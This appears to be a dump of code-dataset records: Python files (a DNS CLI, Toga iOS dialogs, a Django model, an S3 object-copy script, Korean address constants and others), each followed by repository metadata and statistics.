record = self.find_record(self.args.domain or self.prompt('Domain: '), records)
new_record = self.edit_record(record)
for i, choice in enumerate(records):
if choice == record:
records[i] = tuple(new_record)
return records
self.edit_transaction(edit)
def delete_action(self):
def delete(records):
record = self.find_record(self.args.domain or self.prompt('Domain: '), records)
self.output.write(pretty_record(record))
self.output.write('\n')
confirm = self.prompt('Really? [n]: ', required=False) or 'n'
if confirm[0] == 'y':
for i, choice in enumerate(records):
if choice == record:
del records[i]
else:
self.output.write("Ok, cancelled\n")
return records
self.edit_transaction(delete)
def raw_action(self):
try:
# PY3
output = self.output.buffer
except AttributeError:
output = self.output
output.write(encode(self.read_records()))
| 31.59633 | 99 | 0.591173 | 1,622 | 13,776 | 4.924168 | 0.200986 | 0.025041 | 0.028171 | 0.011268 | 0.167272 | 0.125078 | 0.108051 | 0.081507 | 0.07675 | 0.056717 | 0 | 0.008577 | 0.297546 | 13,776 | 435 | 100 | 31.668966 | 0.816782 | 0.043844 | 0 | 0.196481 | 0 | 0 | 0.070194 | 0.001835 | 0 | 0 | 0 | 0 | 0.005865 | 1 | 0.108504 | false | 0.155425 | 0.052786 | 0.020528 | 0.293255 | 0.005865 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
44e3de96d18021f8c3b9a4c81b76aeddcd2ffcd2 | 670 | py | Python | gitviper/gitconnector.py | BeayemX/GitViper | 1d6bb8f070d47868e687d879aa30e572ec6cb876 | [
"MIT"
] | 41 | 2017-11-30T19:38:18.000Z | 2021-04-06T21:39:00.000Z | gitviper/gitconnector.py | BeayemX/GitViper | 1d6bb8f070d47868e687d879aa30e572ec6cb876 | [
"MIT"
] | 24 | 2017-11-21T22:56:45.000Z | 2020-11-03T20:16:11.000Z | gitviper/gitconnector.py | BeayemX/GitViper | 1d6bb8f070d47868e687d879aa30e572ec6cb876 | [
"MIT"
] | 6 | 2017-12-13T13:38:48.000Z | 2022-01-05T19:27:01.000Z | import os
from git import InvalidGitRepositoryError, Repo
from gitviper.colors import *
class Connection:
def __init__(self):
self.repo = None
self.working_directory = None
self.is_git_repo = False
connection = Connection()
def connect():
connection.working_directory = os.getcwd()
# TODO gitviper should also work if executed in a subdirectory of a git repository
git_path = os.path.join(connection.working_directory, ".git")
if os.path.isdir(git_path):
connection.repo = Repo(connection.working_directory)
connection.is_git_repo = True
else:
print(RED + "This is no git repository!" + RESET) | 29.130435 | 86 | 0.701493 | 86 | 670 | 5.302326 | 0.476744 | 0.140351 | 0.171053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.216418 | 670 | 23 | 87 | 29.130435 | 0.868571 | 0.119403 | 0 | 0 | 0 | 0 | 0.050934 | 0 | 0 | 0 | 0 | 0.043478 | 0 | 1 | 0.117647 | false | 0 | 0.176471 | 0 | 0.352941 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
44eeb6a3678576eec5de5e12470d1e6f8be25d51 | 4,570 | py | Python | src/iOS/toga_iOS/dialogs.py | samschott/toga | 400b6935c4689bedb134324b38eb1286af5b5ec6 | [
"BSD-3-Clause"
] | null | null | null | src/iOS/toga_iOS/dialogs.py | samschott/toga | 400b6935c4689bedb134324b38eb1286af5b5ec6 | [
"BSD-3-Clause"
] | null | null | null | src/iOS/toga_iOS/dialogs.py | samschott/toga | 400b6935c4689bedb134324b38eb1286af5b5ec6 | [
"BSD-3-Clause"
] | null | null | null | import asyncio
from rubicon.objc import Block
from rubicon.objc.runtime import objc_id
from toga_iOS.libs import (
UIAlertAction,
UIAlertActionStyle,
UIAlertController,
UIAlertControllerStyle,
)
class BaseDialog:
def __init__(self):
loop = asyncio.get_event_loop()
self.future = loop.create_future()
def __eq__(self, other):
raise RuntimeError(
"Can't check dialog result directly; use await or an on_result handler"
)
def __bool__(self):
raise RuntimeError(
"Can't check dialog result directly; use await or an on_result handler"
)
def __await__(self):
return self.future.__await__()
class AlertDialog(BaseDialog):
def __init__(self, window, title, message, on_result=None):
super().__init__()
self.on_result = on_result
self.dialog = UIAlertController.alertControllerWithTitle(
title, message=message, preferredStyle=UIAlertControllerStyle.Alert
)
self.populate_dialog()
window._impl.controller.presentViewController(
self.dialog,
animated=False,
completion=None,
)
def populate_dialog(
self,
dialog,
):
pass
def response(self, value):
if self.on_result:
self.on_result(self, value)
self.future.set_result(value)
def null_response(self, action: objc_id) -> None:
self.response(None)
def true_response(self, action: objc_id) -> None:
self.response(True)
def false_response(self, action: objc_id) -> None:
self.response(False)
def add_null_response_button(self, label):
self.dialog.addAction(
UIAlertAction.actionWithTitle(
label,
style=UIAlertActionStyle.Default,
handler=Block(self.null_response, None, objc_id),
)
)
def add_true_response_button(self, label):
self.dialog.addAction(
UIAlertAction.actionWithTitle(
label,
style=UIAlertActionStyle.Default,
handler=Block(self.true_response, None, objc_id),
)
)
def add_false_response_button(self, label):
self.dialog.addAction(
UIAlertAction.actionWithTitle(
label,
style=UIAlertActionStyle.Cancel,
handler=Block(self.false_response, None, objc_id),
)
)
class InfoDialog(AlertDialog):
def __init__(self, window, title, message, on_result=None):
super().__init__(window, title, message, on_result=on_result)
def populate_dialog(self):
self.add_null_response_button("OK")
class QuestionDialog(AlertDialog):
def __init__(self, window, title, message, on_result=None):
super().__init__(window, title, message, on_result=on_result)
def populate_dialog(self):
self.add_true_response_button("Yes")
self.add_false_response_button("No")
class ConfirmDialog(AlertDialog):
def __init__(self, window, title, message, on_result=None):
super().__init__(window, title, message, on_result=on_result)
def populate_dialog(self):
self.add_true_response_button("OK")
self.add_false_response_button("Cancel")
class ErrorDialog(AlertDialog):
def __init__(self, window, title, message, on_result=None):
super().__init__(window, title, message, on_result=on_result)
def populate_dialog(self):
self.add_null_response_button("OK")
class StackTraceDialog(BaseDialog):
def __init__(self, window, title, message, on_result=None, **kwargs):
super().__init__()
window.factory.not_implemented("Window.stack_trace_dialog()")
class SaveFileDialog(BaseDialog):
def __init__(
self,
window,
title,
filename,
initial_directory,
file_types=None,
on_result=None,
):
super().__init__()
window.factory.not_implemented("Window.save_file_dialog()")
class OpenFileDialog(BaseDialog):
def __init__(
self, window, title, initial_directory, file_types, multiselect, on_result=None
):
super().__init__()
window.factory.not_implemented("Window.open_file_dialog()")
class SelectFolderDialog(BaseDialog):
def __init__(self, window, title, initial_directory, multiselect, on_result=None):
super().__init__()
window.factory.not_implemented("Window.select_folder_dialog()")
| 27.69697 | 87 | 0.647046 | 489 | 4,570 | 5.670757 | 0.208589 | 0.066354 | 0.039668 | 0.072124 | 0.632889 | 0.614136 | 0.585287 | 0.570141 | 0.492247 | 0.492247 | 0 | 0 | 0.257112 | 4,570 | 164 | 88 | 27.865854 | 0.816789 | 0 | 0 | 0.341463 | 0 | 0 | 0.057112 | 0.023195 | 0 | 0 | 0 | 0 | 0 | 1 | 0.203252 | false | 0.00813 | 0.03252 | 0.00813 | 0.325203 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
44f1ee779a726fff67d92e5ac579e362f94992a0 | 986 | py | Python | djangae/models.py | bocribbz/djangae | 8a118d755cd707e6a452593050c25d790edde944 | [
"BSD-3-Clause"
] | 467 | 2015-01-02T22:35:37.000Z | 2022-02-22T23:13:36.000Z | djangae/models.py | bocribbz/djangae | 8a118d755cd707e6a452593050c25d790edde944 | [
"BSD-3-Clause"
] | 743 | 2015-01-02T15:55:34.000Z | 2021-01-29T09:43:19.000Z | djangae/models.py | bocribbz/djangae | 8a118d755cd707e6a452593050c25d790edde944 | [
"BSD-3-Clause"
] | 154 | 2015-01-01T17:05:59.000Z | 2021-12-09T06:40:07.000Z | from django.db import models
from djangae import patches # noqa
class DeferIterationMarker(models.Model):
"""
Marker to keep track of sharded defer
iteration tasks
"""
# Set to True when all shards have been deferred
is_ready = models.BooleanField(default=False)
shard_count = models.PositiveIntegerField(default=0)
shards_complete = models.PositiveIntegerField(default=0)
delete_on_completion = models.BooleanField(default=True)
created = models.DateTimeField(auto_now_add=True)
callback_name = models.CharField(max_length=100)
finalize_name = models.CharField(max_length=100)
class Meta:
app_label = "djangae"
@property
def is_finished(self):
return self.is_ready and self.shard_count == self.shards_complete
def __unicode__(self):
return "Background Task (%s -> %s) at %s" % (
self.callback_name,
self.finalize_name,
self.created
)
| 26.648649 | 73 | 0.679513 | 117 | 986 | 5.538462 | 0.57265 | 0.021605 | 0.07716 | 0.104938 | 0.095679 | 0.095679 | 0 | 0 | 0 | 0 | 0 | 0.010652 | 0.238337 | 986 | 36 | 74 | 27.388889 | 0.852197 | 0.107505 | 0 | 0 | 0 | 0 | 0.045828 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.095238 | 0.095238 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
44f347e38e371ebb53e0758c63f468672437e9d6 | 694 | py | Python | setup.py | WillBux/Darwin | 7226237283bebff058840dc22132164187d6a1b6 | [
"MIT"
] | 1 | 2018-06-02T20:46:34.000Z | 2018-06-02T20:46:34.000Z | setup.py | WillBux/darwin | 7226237283bebff058840dc22132164187d6a1b6 | [
"MIT"
] | null | null | null | setup.py | WillBux/darwin | 7226237283bebff058840dc22132164187d6a1b6 | [
"MIT"
] | null | null | null | from setuptools import setup
from setuptools import find_packages
setup(name='darwin',
version='0.1',
description='Machine Learning with Genetic Algorithms',
author='Will Buxton',
author_email='will.buxton88@gmail.com',
url='https://github.com/WillBux/darwin',
license='MIT',
install_requires=['tqdm>=4.19.4',
'numpy>=1.13.3',
'pandas>=0.23.4',
'scikit-learn>=0.19.0'],
classifiers=("Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"),
packages=find_packages())
| 36.526316 | 61 | 0.560519 | 74 | 694 | 5.202703 | 0.702703 | 0.072727 | 0.103896 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04321 | 0.299712 | 694 | 18 | 62 | 38.555556 | 0.748971 | 0 | 0 | 0 | 0 | 0 | 0.410663 | 0.033141 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.117647 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
44ff99f1966cb25def6a935cc8e8d094b45ac74a | 1,276 | py | Python | tests/common/test_io.py | astrojuanlu/conda | badf048f5e8287250ef1940249a048f9bde08477 | [
"BSD-3-Clause"
] | 1 | 2017-06-11T01:32:33.000Z | 2017-06-11T01:32:33.000Z | tests/common/test_io.py | astrojuanlu/conda | badf048f5e8287250ef1940249a048f9bde08477 | [
"BSD-3-Clause"
] | null | null | null | tests/common/test_io.py | astrojuanlu/conda | badf048f5e8287250ef1940249a048f9bde08477 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from conda.common.io import attach_stderr_handler, captured
from logging import DEBUG, NOTSET, WARN, getLogger
def test_attach_stderr_handler():
name = 'abbacadabba'
logr = getLogger(name)
assert len(logr.handlers) == 0
assert logr.level is NOTSET
debug_message = "debug message 1329-485"
with captured() as c:
attach_stderr_handler(WARN, name)
logr.warn('test message')
logr.debug(debug_message)
assert len(logr.handlers) == 1
assert logr.handlers[0].name == 'stderr'
assert logr.handlers[0].level is NOTSET
assert logr.level is WARN
assert c.stdout == ''
assert 'test message' in c.stderr
assert debug_message not in c.stderr
# round two, with debug
with captured() as c:
attach_stderr_handler(DEBUG, name)
logr.warn('test message')
logr.debug(debug_message)
logr.info('info message')
assert len(logr.handlers) == 1
assert logr.handlers[0].name == 'stderr'
assert logr.handlers[0].level is NOTSET
assert logr.level is DEBUG
assert c.stdout == ''
assert 'test message' in c.stderr
assert debug_message in c.stderr
| 28.355556 | 82 | 0.679467 | 174 | 1,276 | 4.862069 | 0.275862 | 0.099291 | 0.076832 | 0.089835 | 0.56383 | 0.56383 | 0.56383 | 0.483452 | 0.483452 | 0.387707 | 0 | 0.015106 | 0.221787 | 1,276 | 44 | 83 | 29 | 0.836858 | 0.033699 | 0 | 0.5 | 0 | 0 | 0.085505 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.03125 | false | 0 | 0.09375 | 0 | 0.125 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7802f742be27a766b4db20255b494ac4739dd458 | 1,588 | py | Python | components/collector/src/base_collectors/api_source_collector.py | kargaranamir/quality-time | 1c427c61bee9d31c3526f0a01be2218a7e167c23 | [
"Apache-2.0"
] | 33 | 2016-01-20T07:35:48.000Z | 2022-03-14T09:20:51.000Z | components/collector/src/base_collectors/api_source_collector.py | kargaranamir/quality-time | 1c427c61bee9d31c3526f0a01be2218a7e167c23 | [
"Apache-2.0"
] | 2,410 | 2016-01-22T18:13:01.000Z | 2022-03-31T16:57:34.000Z | components/collector/src/base_collectors/api_source_collector.py | kargaranamir/quality-time | 1c427c61bee9d31c3526f0a01be2218a7e167c23 | [
"Apache-2.0"
] | 21 | 2016-01-16T11:49:23.000Z | 2022-01-14T21:53:22.000Z | """API source collector base classes."""
from abc import ABC
from datetime import datetime
from collector_utilities.type import URL, Response
from model import SourceResponses
from .source_collector import SourceCollector, SourceUpToDatenessCollector
class JenkinsPluginCollector(SourceCollector, ABC): # skipcq: PYL-W0223
"""Base class for Jenkins plugin collectors."""
plugin = "Subclass responsibility"
depth = 0 # Override to pass a higher depth to the plugin API, which means: "please, give me more details"
async def _api_url(self) -> URL:
"""Extend to return the API URL for the plugin, with an optional depth."""
depth = f"?depth={self.depth}" if self.depth > 0 else ""
return URL(f"{await super()._api_url()}/lastSuccessfulBuild/{self.plugin}/api/json{depth}")
async def _landing_url(self, responses: SourceResponses) -> URL:
"""Override to return the URL for the plugin."""
return URL(f"{await super()._api_url()}/lastSuccessfulBuild/{self.plugin}")
class JenkinsPluginSourceUpToDatenessCollector(SourceUpToDatenessCollector):
"""Base class for Jenkins plugin source up-to-dateness collectors."""
async def _api_url(self) -> URL:
"""Extend to return the API URL for the job."""
return URL(f"{await super()._api_url()}/lastSuccessfulBuild/api/json")
async def _parse_source_response_date_time(self, response: Response) -> datetime:
"""Override to parse the job's timestamp."""
return datetime.fromtimestamp(float((await response.json())["timestamp"]) / 1000.0)
| 41.789474 | 111 | 0.714106 | 199 | 1,588 | 5.603015 | 0.361809 | 0.037668 | 0.029596 | 0.040359 | 0.273543 | 0.2287 | 0.2287 | 0.2287 | 0.188341 | 0.188341 | 0 | 0.008378 | 0.173174 | 1,588 | 37 | 112 | 42.918919 | 0.840823 | 0.15995 | 0 | 0.111111 | 0 | 0 | 0.219203 | 0.153986 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.277778 | 0 | 0.722222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7803618eb0ae1dc78214daffa6ff69e1281707e9 | 4,854 | py | Python | apps/address/constants.py | ozet-team/ozet-server | 4772d37339634adee6ace65a5e2380df4bd22bbb | [
"MIT"
] | null | null | null | apps/address/constants.py | ozet-team/ozet-server | 4772d37339634adee6ace65a5e2380df4bd22bbb | [
"MIT"
] | 4 | 2021-11-27T14:15:55.000Z | 2021-12-10T12:59:44.000Z | apps/address/constants.py | ozet-team/ozet-server | 4772d37339634adee6ace65a5e2380df4bd22bbb | [
"MIT"
] | null | null | null | class AppConstants:
ADDRESS = {
"서울": [
"강남구",
"강동구",
"강북구",
"강서구",
"관악구",
"광진구",
"구로구",
"금천구",
"노원구",
"도봉구",
"동대문구",
"동작구",
"마포구",
"서대문구",
"서초구",
"성동구",
"성북구",
"송파구",
"양천구",
"영등포구",
"용산구",
"은평구",
"종로구",
"중구",
"중랑구",
],
"부산": [
"강서구",
"금정구",
"기장군",
"남구",
"동구",
"동래구",
"부산진구",
"북구",
"사상구",
"사하구",
"서구",
"수영구",
"연제구",
"영도구",
"중구",
"해운대구",
],
"대구": ["남구", "달서구", "달성군", "동구", "북구", "서구", "수성구", "중구"],
"인천": ["강화군", "계양구", "남동구", "동구", "미추홀구", "부평구", "서구", "연수구", "옹진군", "중구"],
"광주": ["광산구", "남구", "동구", "북구", "서구"],
"대전": ["대덕구", "동구", "서구", "유성구", "중구"],
"울산": ["남구", "동구", "북구", "울주군", "중구"],
"세종": [],
"경기": [
"가평군",
"고양시 덕양구",
"고양시 일산동구",
"고양시 일산서구",
"과천시",
"광명시",
"광주시",
"구리시",
"군포시",
"김포시",
"남양주시",
"동두천시",
"부천시",
"성남시 분당구",
"성남시 수정구",
"성남시 중원구",
"수원시 권선구",
"수원시 영통구",
"수원시 장안구",
"수원시 팔달구",
"시흥시",
"안산시 단원구",
"안산시 상록구",
"안성시",
"안양시 동안구",
"안양시 만안구",
"양주시",
"양평군",
"여주시",
"연천군",
"오산시",
"용인시 기흥구",
"용인시 수지구",
"용인시 처인구",
"의왕시",
"의정부시",
"이천시",
"파주시",
"평택시",
"포천시",
"하남시",
"화성시",
],
"강원": [
"강릉시",
"고성군",
"동해시",
"삼척시",
"속초시",
"양구군",
"양양군",
"영월군",
"원주시",
"인제군",
"정선군",
"철원군",
"춘천시",
"태백시",
"평창군",
"홍천군",
"화천군",
"횡성군",
],
"충북": [
"괴산군",
"단양군",
"보은군",
"영동군",
"옥천군",
"음성군",
"제천시",
"증평군",
"진천군",
"청주시 상당구",
"청주시 서원구",
"청주시 청원구",
"청주시 흥덕구",
"충주시",
],
"충남": [
"계룡시",
"공주시",
"금산군",
"논산시",
"당진시",
"보령시",
"부여군",
"서산시",
"서천군",
"아산시",
"예산군",
"천안시 동남구",
"천안시 서북구",
"청양군",
"태안군",
"홍성군",
],
"전북": [
"고창군",
"군산시",
"김제시",
"남원시",
"무주군",
"부안군",
"순창군",
"완주군",
"익산시",
"임실군",
"장수군",
"전주시 덕진구",
"전주시 완산구",
"정읍시",
"진안군",
],
"전남": [
"강진군",
"고흥군",
"곡성군",
"광양시",
"구례군",
"나주시",
"담양군",
"목포시",
"무안군",
"보성군",
"순천시",
"신안군",
"여수시",
"영광군",
"영암군",
"완도군",
"장성군",
"장흥군",
"진도군",
"함평군",
"해남군",
"화순군",
],
"경북": [
"경산시",
"경주시",
"고령군",
"구미시",
"군위군",
"김천시",
"문경시",
"봉화군",
"상주시",
"성주군",
"안동시",
"영덕군",
"영양군",
"영주시",
"영천시",
"예천군",
"울릉군",
"울진군",
"의성군",
"청도군",
"청송군",
"칠곡군",
"포항시 남구",
"포항시 북구",
],
"경남": [
"거제시",
"거창군",
"고성군",
"김해시",
"남해군",
"밀양시",
"사천시",
"산청군",
"양산시",
"의령군",
"진주시",
"창녕군",
"창원시 마산합포구",
"창원시 마산회원구",
"창원시 성산구",
"창원시 의창구",
"창원시 진해구",
"통영시",
"하동군",
"함안군",
"함양군",
"합천군",
],
"제주": ["서귀포시", "제주시"],
}
| 19.812245 | 83 | 0.183354 | 301 | 4,854 | 2.956811 | 0.850498 | 0.013483 | 0.013483 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.642151 | 4,854 | 244 | 84 | 19.893443 | 0.512378 | 0 | 0 | 0.065574 | 0 | 0 | 0.185002 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.008197 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
780711d65aaf7ad757cd312974c9dcd270340af5 | 6,019 | py | Python | aws-blog-campanile/bin/objectcopy.py | securityscorecard/aws-big-data-blog | 6c726f60c293f26de57469b9332f92a3807423c5 | [
"Apache-2.0"
] | 305 | 2018-03-29T10:45:51.000Z | 2022-03-15T16:01:19.000Z | aws-blog-campanile/bin/objectcopy.py | securityscorecard/aws-big-data-blog | 6c726f60c293f26de57469b9332f92a3807423c5 | [
"Apache-2.0"
] | 14 | 2018-04-26T19:06:35.000Z | 2022-02-26T10:50:19.000Z | aws-blog-campanile/bin/objectcopy.py | securityscorecard/aws-big-data-blog | 6c726f60c293f26de57469b9332f92a3807423c5 | [
"Apache-2.0"
] | 204 | 2018-03-26T23:43:30.000Z | 2022-03-20T17:04:41.000Z | #!/usr/bin/python2.7
import sys
import os
import fileinput
import argparse
import random
import tempfile
import ConfigParser
# -----------------------------------------------------------------------------
# Support for Hadoop Streaming Sandbox Env
# -----------------------------------------------------------------------------
sys.path.append(os.environ.get('PWD'))
os.environ["BOTO_PATH"] = '/etc/boto.cfg:~/.boto:./.boto'
import campanile
import boto
from boto.s3.connection import S3Connection
# -----------------------------------------------------------------------------
# Global
# -----------------------------------------------------------------------------
# cfgfiles Config file search path
# -----------------------------------------------------------------------------
cfgfiles = [
"/etc/campanile.cfg",
"./campanile.cfg"
]
# -----------------------------------------------------------------------------
# Functions
# -----------------------------------------------------------------------------
def main():
## Args
parser = argparse.ArgumentParser()
parser.add_argument('--src-bucket', required=True, dest='src',
help='Source S3 bucket')
parser.add_argument('--dst-bucket', required=True, dest='dst',
help='Destination S3 bucket')
parser.add_argument('--src-endpoint',
default=boto.s3.connection.NoHostProvided,
help='S3 source endpoint')
parser.add_argument('--dst-endpoint',
default=boto.s3.connection.NoHostProvided,
help='S3 destination endpoint')
parser.add_argument('--src-profile',
help='Boto profile used for source connection')
parser.add_argument('--dst-profile',
help='Boto profile used for destination connection')
parser.add_argument('--config', '-c', default="./campanile.cfg",
help='Path to config file')
args = parser.parse_args()
## Config Object
cfgfiles = campanile.cfg_file_locations()
cfgfiles.insert(0, args.config)
c = ConfigParser.SafeConfigParser({'ephemeral':'/tmp'})
c.read(cfgfiles)
## S3 Bucket Connections
src_bucket = S3Connection(suppress_consec_slashes=False,\
host=args.src_endpoint,is_secure=True,
profile_name=args.src_profile).\
get_bucket(args.src,validate=False)
dst_bucket = S3Connection(suppress_consec_slashes=False,\
host=args.dst_endpoint,is_secure=True,
profile_name=args.dst_profile).\
get_bucket(args.dst,validate=False)
## Reporting Counters
files = 0
movedbytes = 0
## Select random tmpdir to distribute load across disks
tmpdir = random.choice(c.get('DEFAULT',"ephemeral").split(','))
start_index = campanile.stream_index()
for line in fileinput.input("-"):
name, etag, size, mtime, mid, part, partcount, startbyte, stopbyte \
= line.rstrip('\n').split('\t')[start_index:]
srckey = src_bucket.get_key(name, validate=False)
dstkey = dst_bucket.get_key(name, validate=False)
if mid == campanile.NULL:
headers={}
report_name = name
expected_size = int(size)
else:
headers={'Range' : "bytes=%s-%s" % (startbyte, stopbyte)}
report_name = "%s-%s" % (name, 'part')
expected_size = int(stopbyte) - int(startbyte) + 1
with tempfile.SpooledTemporaryFile(max_size=c.getint('DEFAULT',\
'maxtmpsize'),dir=tmpdir) as fp:
## Download
p = campanile.FileProgress(name, verbose=1)
srckey.get_contents_to_file(fp, headers=headers, cb=p.progress)
if fp.tell() != expected_size:
raise Exception("Something bad happened for %s. \
Expecting %s, but got %s" % \
(report_name, expected_size, fp.tell()))
campanile.counter(args.src, "OutputBytes", size)
fp.flush
fp.seek(0)
if mid == campanile.NULL:
dstkey.cache_control= srckey.cache_control
dstkey.content_type = srckey.content_type
dstkey.content_encoding = srckey.content_encoding
dstkey.content_disposition = srckey.content_disposition
dstkey.content_language = srckey.content_language
dstkey.metadata = srckey.metadata
dstkey.md5 = srckey.md5
report_name = name
else:
mp = boto.s3.multipart.MultiPartUpload(bucket=dst_bucket)
mp.id = mid
mp.key_name = name
report_name = "%s-%s" % (name, part)
## Upload
p = campanile.FileProgress(report_name, verbose=1)
if mid == campanile.NULL:
dstkey.set_contents_from_file(fp,
encrypt_key=srckey.encrypted, cb=p.progress)
newetag = dstkey.etag.replace("\"","")
else:
mpart = mp.upload_part_from_file(fp,part_num=int(part),
cb=p.progress)
newetag = mpart.etag.replace("\"","")
if newetag != srckey.md5:
## Add alert
raise Exception("Something bad happened for %s. \
Expecting %s md5, but got %s" % \
(report_name, srckey.md5, newetag))
if mid != campanile.NULL:
print "%s\t%s\t%s\t%s\t%s\t%s\t%s" % \
(name, etag, mid, newetag, part, startbyte, stopbyte)
campanile.counter(args.dst, "InputBytes", expected_size)
campanile.status("%s/%s:OK" % (args.dst,report_name))
# -----------------------------------------------------------------------------
# Main
# -----------------------------------------------------------------------------
if __name__ == "__main__":
main()
| 38.583333 | 79 | 0.511879 | 584 | 6,019 | 5.140411 | 0.30137 | 0.026649 | 0.03964 | 0.006662 | 0.224184 | 0.180213 | 0.128248 | 0.10493 | 0.036309 | 0.00433 | 0 | 0.005896 | 0.26732 | 6,019 | 155 | 80 | 38.832258 | 0.67483 | 0.160159 | 0 | 0.110092 | 0 | 0.009174 | 0.101911 | 0.010947 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.091743 | null | null | 0.009174 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
780fad77d312784127e399f00c7f290a144c53ef | 325 | py | Python | test/test_blog.py | Jn-mic/blog | 065e6ce4c71065a2e81c227424da5271300757ea | [
"MIT"
] | null | null | null | test/test_blog.py | Jn-mic/blog | 065e6ce4c71065a2e81c227424da5271300757ea | [
"MIT"
] | null | null | null | test/test_blog.py | Jn-mic/blog | 065e6ce4c71065a2e81c227424da5271300757ea | [
"MIT"
] | null | null | null | from app.models import User,Post, Comment,Clap
from app import db
# def setUp(self):
# self.user_Jack = User(username = 'Jack',password = 'vila', email = 'jackotienokey@gmail.com')
def tearDown(self):
Post.query.delete()
User.query.delete()
Comment.query.delete()
Clap.query.delete() | 29.545455 | 99 | 0.646154 | 42 | 325 | 4.97619 | 0.547619 | 0.210526 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215385 | 325 | 11 | 100 | 29.545455 | 0.819608 | 0.350769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7817a693208f067b414838d30d8b8daa4391d49d | 1,295 | py | Python | src/pytools/viz/util/_matplot.py | BCG-Gamma/pytools | d7be703e0665917cd75b671564d5c0163f13b77b | [
"Apache-2.0"
] | 17 | 2021-01-12T08:07:11.000Z | 2022-03-03T22:59:04.000Z | src/pytools/viz/util/_matplot.py | BCG-Gamma/pytools | d7be703e0665917cd75b671564d5c0163f13b77b | [
"Apache-2.0"
] | 10 | 2021-01-08T17:04:39.000Z | 2022-01-18T13:21:52.000Z | src/pytools/viz/util/_matplot.py | BCG-Gamma/pytools | d7be703e0665917cd75b671564d5c0163f13b77b | [
"Apache-2.0"
] | 1 | 2021-11-06T00:16:43.000Z | 2021-11-06T00:16:43.000Z | """
Utilities related to matplotlib.
"""
import logging
from matplotlib.ticker import Formatter
from pytools.api import AllTracker
from pytools.meta import SingletonMeta
log = logging.getLogger(__name__)
#
# Exported names
#
__all__ = ["PercentageFormatter"]
#
# Ensure all symbols introduced below are included in __all__
#
__tracker = AllTracker(globals())
#
# Classes
#
class PercentageFormatter(Formatter, metaclass=SingletonMeta):
"""
Formats floats as a percentages with 3 digits precision, omitting trailing zeros.
